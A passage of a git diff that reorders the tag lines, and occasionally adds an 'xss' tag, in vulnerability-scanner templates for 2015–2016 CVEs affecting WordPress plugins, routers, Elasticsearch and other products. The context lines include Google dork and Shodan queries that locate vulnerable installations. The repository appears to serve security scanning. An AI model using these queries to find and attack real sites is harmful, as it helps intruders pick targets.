google-query: inurl:"/wp-content/plugins/navis-documentcloud"
- tags: cve,cve2015,wordpress,wp-plugin,xss,documentcloud
+ tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml
index 868a79a466..ce8dc518be 100644
--- a/http/cves/2015/CVE-2015-2863.yaml
+++ b/http/cves/2015/CVE-2015-2863.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: kaseya
product: virtual_system_administrator
- tags: cve,cve2015,redirect,kaseya
+ tags: cve2015,cve,redirect,kaseya
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml
index 1f1fb1103b..06b8982704 100644
--- a/http/cves/2015/CVE-2015-2996.yaml
+++ b/http/cves/2015/CVE-2015-2996.yaml
@@ -28,7 +28,7 @@ info:
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:1540720428
- tags: cve,cve2015,sysaid,lfi,seclists
+ tags: cve2015,cve,sysaid,lfi,seclists
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml
index acf69a11a0..c9680084d0 100644
--- a/http/cves/2015/CVE-2015-3035.yaml
+++ b/http/cves/2015/CVE-2015-3035.yaml
@@ -30,7 +30,7 @@ info:
vendor: tp-link
product: tl-wr841n_\(9.0\)_firmware
shodan-query: http.title:"TP-LINK"
- tags: router,lfi,seclists,cve,cve2015,tplink,kev,tp-link
+ tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml
index 7f2a2eb4fe..42154ba366 100644
--- a/http/cves/2015/CVE-2015-3224.yaml
+++ b/http/cves/2015/CVE-2015-3224.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: rubyonrails
product: web_console
- tags: ruby,hackerone,cve,cve2015,rce,rails,intrusive,rubyonrails
+ tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml
index ad4e273dfd..6183272fe9 100644
--- a/http/cves/2015/CVE-2015-3337.yaml
+++ b/http/cves/2015/CVE-2015-3337.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: elasticsearch
product: elasticsearch
- tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin
+ tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml
index fbbe025d59..1548ec61b5 100644
--- a/http/cves/2015/CVE-2015-3648.yaml
+++ b/http/cves/2015/CVE-2015-3648.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: montala
product: resourcespace
- tags: lfi,resourcespace,packetstorm,cve,cve2015,montala
+ tags: cve2015,cve,lfi,resourcespace,packetstorm,montala
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml
index caf7533128..11a1e36b47 100644
--- a/http/cves/2015/CVE-2015-3897.yaml
+++ b/http/cves/2015/CVE-2015-3897.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: bonitasoft
product: bonita_bpm_portal
- tags: unauth,packetstorm,cve,cve2015,bonita,lfi,bonitasoft
+ tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml
index be416ec975..6404bacdaa 100644
--- a/http/cves/2015/CVE-2015-4050.yaml
+++ b/http/cves/2015/CVE-2015-4050.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: sensiolabs
product: symfony
- tags: cve,cve2015,symfony,rce,sensiolabs
+ tags: cve2015,cve,symfony,rce,sensiolabs
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml
index c7161a01c7..e2270b1513 100644
--- a/http/cves/2015/CVE-2015-4062.yaml
+++ b/http/cves/2015/CVE-2015-4062.yaml
@@ -30,7 +30,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
- tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp,newstatpress_project
+ tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml
index fa067736ff..9644ef528f 100644
--- a/http/cves/2015/CVE-2015-4063.yaml
+++ b/http/cves/2015/CVE-2015-4063.yaml
@@ -29,7 +29,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
- tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project
+ tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml
index 32ba0bee7f..fdf9a085aa 100644
--- a/http/cves/2015/CVE-2015-4074.yaml
+++ b/http/cves/2015/CVE-2015-4074.yaml
@@ -27,7 +27,7 @@ info:
vendor: helpdesk_pro_project
product: helpdesk_pro
framework: joomla\!
- tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin,helpdesk_pro_project,joomla\!
+ tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml
index 0a060051c8..b1aeefb0c4 100644
--- a/http/cves/2015/CVE-2015-4127.yaml
+++ b/http/cves/2015/CVE-2015-4127.yaml
@@ -28,7 +28,7 @@ info:
vendor: church_admin_project
product: church_admin
framework: wordpress
- tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss,church_admin_project
+ tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml
index b9bedd10b8..b7298e69df 100644
--- a/http/cves/2015/CVE-2015-4414.yaml
+++ b/http/cves/2015/CVE-2015-4414.yaml
@@ -29,7 +29,7 @@ info:
product: se_html5_album_audio_player
framework: wordpress
google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
- tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project
+ tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml
index 4cb0a7f5b0..83d105b60b 100644
--- a/http/cves/2015/CVE-2015-4632.yaml
+++ b/http/cves/2015/CVE-2015-4632.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: koha
product: koha
- tags: cve,cve2015,lfi,edb,koha
+ tags: cve2015,cve,lfi,edb,koha
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml
index dc4d739857..a0583d8a1b 100644
--- a/http/cves/2015/CVE-2015-4666.yaml
+++ b/http/cves/2015/CVE-2015-4666.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: xceedium
product: xsuite
- tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015
+ tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml
index c65d9fe3bd..40c245547f 100644
--- a/http/cves/2015/CVE-2015-4668.yaml
+++ b/http/cves/2015/CVE-2015-4668.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: xceedium
product: xsuite
- tags: cve,cve2015,redirect,xsuite,xceedium,edb
+ tags: cve2015,cve,redirect,xsuite,xceedium,edb
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml
index 2520deca2c..c2b5f0f72a 100644
--- a/http/cves/2015/CVE-2015-4694.yaml
+++ b/http/cves/2015/CVE-2015-4694.yaml
@@ -29,7 +29,7 @@ info:
product: zip_attachments
framework: wordpress
google-query: inurl:"/wp-content/plugins/zip-attachments"
- tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve,zip_attachments_project
+ tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml
index 7268acf731..9521f1761b 100644
--- a/http/cves/2015/CVE-2015-5354.yaml
+++ b/http/cves/2015/CVE-2015-5354.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: novius-os
product: novius_os
- tags: packetstorm,cve,cve2015,redirect,novius,novius-os
+ tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml
index 57a0d918a8..41779d8e2f 100644
--- a/http/cves/2015/CVE-2015-5461.yaml
+++ b/http/cves/2015/CVE-2015-5461.yaml
@@ -29,7 +29,7 @@ info:
product: stageshow
framework: wordpress
google-query: inurl:"/wp-content/plugins/stageshow/"
- tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin,stageshow_project
+ tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml
index 2529d4786f..aa82471593 100644
--- a/http/cves/2015/CVE-2015-5469.yaml
+++ b/http/cves/2015/CVE-2015-5469.yaml
@@ -27,7 +27,7 @@ info:
vendor: mdc_youtube_downloader_project
product: mdc_youtube_downloader
framework: wordpress
- tags: cve,cve2015,wp,lfi,mdc_youtube_downloader_project,wordpress
+ tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml
index 42cabb8cc6..05a38139f6 100644
--- a/http/cves/2015/CVE-2015-5471.yaml
+++ b/http/cves/2015/CVE-2015-5471.yaml
@@ -28,7 +28,7 @@ info:
product: swim_team
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-swimteam"
- tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project
+ tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml
index 1814bc9326..86c1864497 100644
--- a/http/cves/2015/CVE-2015-5531.yaml
+++ b/http/cves/2015/CVE-2015-5531.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: elasticsearch
product: elasticsearch
- tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive
+ tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml
index 0c94435848..ba50948fc3 100644
--- a/http/cves/2015/CVE-2015-5688.yaml
+++ b/http/cves/2015/CVE-2015-5688.yaml
@@ -28,7 +28,7 @@ info:
vendor: geddyjs
product: geddy
framework: node.js
- tags: cve,cve2015,geddy,lfi,geddyjs,node.js
+ tags: cve2015,cve,geddy,lfi,geddyjs,node.js
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml
index 64952bb66a..002033be65 100644
--- a/http/cves/2015/CVE-2015-6477.yaml
+++ b/http/cves/2015/CVE-2015-6477.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: nordex
product: nordex_control_2_scada
- tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015
+ tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2
http:
- method: POST
diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml
index 7bf5e10d20..930b5bf2b0 100644
--- a/http/cves/2015/CVE-2015-6544.yaml
+++ b/http/cves/2015/CVE-2015-6544.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: combodo
product: itop
- tags: cve,cve2015,xss,itop,combodo
+ tags: cve2015,cve,xss,itop,combodo
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml
index 6a54a96234..9a851d16b4 100644
--- a/http/cves/2015/CVE-2015-6920.yaml
+++ b/http/cves/2015/CVE-2015-6920.yaml
@@ -24,7 +24,7 @@ info:
vendor: sourceafrica_project
product: sourceafrica
framework: wordpress
- tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress,sourceafrica_project
+ tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml
index 146702ec93..af5b295bcb 100644
--- a/http/cves/2015/CVE-2015-7245.yaml
+++ b/http/cves/2015/CVE-2015-7245.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: d-link
product: dvg-n5402sp_firmware
- tags: cve,cve2015,dlink,lfi,packetstorm,edb,d-link
+ tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml
index 0344b55a05..f218b05e21 100644
--- a/http/cves/2015/CVE-2015-7297.yaml
+++ b/http/cves/2015/CVE-2015-7297.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: joomla
product: joomla\!
- tags: packetstorm,cve,cve2015,joomla,sqli
+ tags: cve2015,cve,packetstorm,joomla,sqli
variables:
num: "999999999"
diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml
index 771ee13d37..83aa9a74c8 100644
--- a/http/cves/2015/CVE-2015-7377.yaml
+++ b/http/cves/2015/CVE-2015-7377.yaml
@@ -28,7 +28,7 @@ info:
vendor: genetechsolutions
product: pie_register
framework: wordpress
- tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve,genetechsolutions
+ tags: cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml
index 1cb19dce20..aeb17bb4ef 100644
--- a/http/cves/2015/CVE-2015-7450.yaml
+++ b/http/cves/2015/CVE-2015-7450.yaml
@@ -28,7 +28,7 @@ info:
vendor: ibm
product: tivoli_common_reporting
shodan-query: http.html:"IBM WebSphere Portal"
- tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
+ tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml
index da2916da95..c46764fea8 100644
--- a/http/cves/2015/CVE-2015-7780.yaml
+++ b/http/cves/2015/CVE-2015-7780.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zohocorp
product: manageengine_firewall_analyzer
- tags: manageengine,edb,cve,cve2015,lfi,zohocorp
+ tags: cve2015,cve,manageengine,edb,lfi,zohocorp
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml
index 35513fc5fe..6388ee5a6e 100644
--- a/http/cves/2015/CVE-2015-7823.yaml
+++ b/http/cves/2015/CVE-2015-7823.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: kentico
product: kentico_cms
- tags: cve,cve2015,kentico,redirect,packetstorm
+ tags: cve2015,cve,kentico,redirect,packetstorm
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml
index 0a55d8cd36..232e3f8711 100644
--- a/http/cves/2015/CVE-2015-8349.yaml
+++ b/http/cves/2015/CVE-2015-8349.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: gameconnect
product: sourcebans
- tags: cve,cve2015,xss,sourcebans,gameconnect
+ tags: cve2015,cve,xss,sourcebans,gameconnect
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml
index 66975ca9e6..b76f7641e0 100644
--- a/http/cves/2015/CVE-2015-8399.yaml
+++ b/http/cves/2015/CVE-2015-8399.yaml
@@ -26,7 +26,7 @@ info:
vendor: atlassian
product: confluence
shodan-query: http.component:"Atlassian Confluence"
- tags: edb,cve,cve2015,atlassian,confluence
+ tags: cve2015,cve,edb,atlassian,confluence
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml
index f31ce86d95..1972358579 100644
--- a/http/cves/2015/CVE-2015-8813.yaml
+++ b/http/cves/2015/CVE-2015-8813.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: umbraco
product: umbraco
- tags: cve,cve2015,ssrf,oast,umbraco
+ tags: cve2015,cve,ssrf,oast,umbraco
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml
index 87d5493831..37f3578604 100644
--- a/http/cves/2015/CVE-2015-9312.yaml
+++ b/http/cves/2015/CVE-2015-9312.yaml
@@ -28,7 +28,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
- tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin,newstatpress_project
+ tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml
index a9938e4a4b..1654c64569 100644
--- a/http/cves/2015/CVE-2015-9323.yaml
+++ b/http/cves/2015/CVE-2015-9323.yaml
@@ -27,7 +27,7 @@ info:
vendor: duckdev
product: 404_to_301
framework: wordpress
- tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
+ tags: cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml
index c4151cffce..0c2ea2cfe9 100644
--- a/http/cves/2015/CVE-2015-9414.yaml
+++ b/http/cves/2015/CVE-2015-9414.yaml
@@ -28,7 +28,7 @@ info:
product: wp-symposium
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-symposium"
- tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin,wpsymposiumpro
+ tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml
index c0797ed689..0a2b893375 100644
--- a/http/cves/2015/CVE-2015-9480.yaml
+++ b/http/cves/2015/CVE-2015-9480.yaml
@@ -26,7 +26,7 @@ info:
product: robotcpa
framework: wordpress
google-query: inurl:"/wp-content/plugins/robotcpa"
- tags: wp-plugin,lfi,edb,cve,cve2015,wordpress,robot-cpa
+ tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml
index ef1928e067..081c916e0d 100644
--- a/http/cves/2016/CVE-2016-0957.yaml
+++ b/http/cves/2016/CVE-2016-0957.yaml
@@ -25,7 +25,7 @@ info:
vendor: adobe
product: dispatcher
shodan-query: http.component:"Adobe Experience Manager"
- tags: cve,cve2016,adobe,aem
+ tags: cve2016,cve,adobe,aem
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml
index 68d9de176d..93e9bfc080 100644
--- a/http/cves/2016/CVE-2016-1000126.yaml
+++ b/http/cves/2016/CVE-2016-1000126.yaml
@@ -27,7 +27,7 @@ info:
product: admin-font-editor
framework: wordpress
google-query: inurl:"/wp-content/plugins/admin-font-editor"
- tags: cve,cve2016,wordpress,xss,wp-plugin,admin-font-editor_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml
index 893efd080d..ef37ca3157 100644
--- a/http/cves/2016/CVE-2016-1000127.yaml
+++ b/http/cves/2016/CVE-2016-1000127.yaml
@@ -26,7 +26,7 @@ info:
vendor: ajax-random-post_project
product: ajax-random-post
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,ajax-random-post_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml
index 825d316bdf..628b9a3118 100644
--- a/http/cves/2016/CVE-2016-1000128.yaml
+++ b/http/cves/2016/CVE-2016-1000128.yaml
@@ -25,7 +25,7 @@ info:
product: anti-plagiarism
framework: wordpress
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
- tags: cve,cve2016,wordpress,xss,wp-plugin,anti-plagiarism_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml
index 30271e72e5..fddf5a1f4c 100644
--- a/http/cves/2016/CVE-2016-1000129.yaml
+++ b/http/cves/2016/CVE-2016-1000129.yaml
@@ -27,7 +27,7 @@ info:
product: defa-online-image-protector
framework: wordpress
google-query: inurl:"/wp-content/plugins/defa-online-image-protector"
- tags: cve,cve2016,wordpress,xss,wp-plugin,defa-online-image-protector_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml
index 698bd404f1..5269ed66e9 100644
--- a/http/cves/2016/CVE-2016-1000130.yaml
+++ b/http/cves/2016/CVE-2016-1000130.yaml
@@ -27,7 +27,7 @@ info:
product: e-search
framework: wordpress
google-query: inurl:"/wp-content/plugins/e-search"
- tags: cve,cve2016,wordpress,xss,wp-plugin,e-search_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml
index b49765daf5..a79fd50f15 100644
--- a/http/cves/2016/CVE-2016-1000131.yaml
+++ b/http/cves/2016/CVE-2016-1000131.yaml
@@ -27,7 +27,7 @@ info:
product: esearch
framework: wordpress
google-query: inurl:"/wp-content/plugins/e-search"
- tags: cve,cve2016,wordpress,xss,wp-plugin,e-search_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml
index d3580c2873..73b9d29799 100644
--- a/http/cves/2016/CVE-2016-1000132.yaml
+++ b/http/cves/2016/CVE-2016-1000132.yaml
@@ -27,7 +27,7 @@ info:
product: tooltip_glossary
framework: wordpress
google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary"
- tags: cve,cve2016,wordpress,xss,wp-plugin,cminds
+ tags: cve2016,cve,wordpress,xss,wp-plugin,cminds
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml
index f68ea329e6..1a7108be8e 100644
--- a/http/cves/2016/CVE-2016-1000133.yaml
+++ b/http/cves/2016/CVE-2016-1000133.yaml
@@ -27,7 +27,7 @@ info:
product: forget_about_shortcode_buttons
framework: wordpress
google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons"
- tags: cve,cve2016,wordpress,xss,wp-plugin,designsandcode
+ tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml
index 3eebe36650..1b7d286492 100644
--- a/http/cves/2016/CVE-2016-1000134.yaml
+++ b/http/cves/2016/CVE-2016-1000134.yaml
@@ -27,7 +27,7 @@ info:
product: hdw-tube
framework: wordpress
google-query: inurl:"/wp-content/plugins/hdw-tube"
- tags: cve,cve2016,wordpress,xss,wp-plugin,hdw-tube_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml
index f227aee8d0..52acd85c1a 100644
--- a/http/cves/2016/CVE-2016-1000135.yaml
+++ b/http/cves/2016/CVE-2016-1000135.yaml
@@ -27,7 +27,7 @@ info:
product: hdw-tube
framework: wordpress
google-query: inurl:"/wp-content/plugins/hdw-tube"
- tags: cve,cve2016,wordpress,xss,wp-plugin,hdw-tube_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml
index 75dd091159..c269c12e9c 100644
--- a/http/cves/2016/CVE-2016-1000136.yaml
+++ b/http/cves/2016/CVE-2016-1000136.yaml
@@ -25,7 +25,7 @@ info:
product: heat-trackr
framework: wordpress
google-query: inurl:"/wp-content/plugins/heat-trackr"
- tags: cve,cve2016,wordpress,xss,wp-plugin,heat-trackr_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml
index dcf54480c2..7e9d557e54 100644
--- a/http/cves/2016/CVE-2016-1000137.yaml
+++ b/http/cves/2016/CVE-2016-1000137.yaml
@@ -26,7 +26,7 @@ info:
vendor: hero-maps-pro_project
product: hero-maps-pro
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,maps,hero-maps-pro_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml
index 74960b68de..8cdd1f52ed 100644
--- a/http/cves/2016/CVE-2016-1000139.yaml
+++ b/http/cves/2016/CVE-2016-1000139.yaml
@@ -28,7 +28,7 @@ info:
product: infusionsoft
framework: wordpress
google-query: inurl:"/wp-content/plugins/infusionsoft"
- tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan,infusionsoft_project
+ tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml
index 3cf05a91dd..2a62fc3e3c 100644
--- a/http/cves/2016/CVE-2016-1000140.yaml
+++ b/http/cves/2016/CVE-2016-1000140.yaml
@@ -26,7 +26,7 @@ info:
vendor: new-year-firework_project
product: new-year-firework
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,new-year-firework_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml
index df7400be6b..e8cb394c27 100644
--- a/http/cves/2016/CVE-2016-1000142.yaml
+++ b/http/cves/2016/CVE-2016-1000142.yaml
@@ -27,7 +27,7 @@ info:
vendor: parsi-font_project
product: parsi-font
framework: wordpress
- tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve,parsi-font_project
+ tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml
index 5bbb52edee..931dd18ce2 100644
--- a/http/cves/2016/CVE-2016-1000143.yaml
+++ b/http/cves/2016/CVE-2016-1000143.yaml
@@ -26,7 +26,7 @@ info:
vendor: photoxhibit_project
product: photoxhibit
framework: wordpress
- tags: cve,cve2016,wordpress,wp-plugin,xss,photoxhibit_project
+ tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml
index c69080d170..6d6e67f293 100644
--- a/http/cves/2016/CVE-2016-1000146.yaml
+++ b/http/cves/2016/CVE-2016-1000146.yaml
@@ -26,7 +26,7 @@ info:
vendor: pondol-formmail_project
product: pondol-formmail
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,mail,pondol-formmail_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml
index 82b856ada7..643453e50c 100644
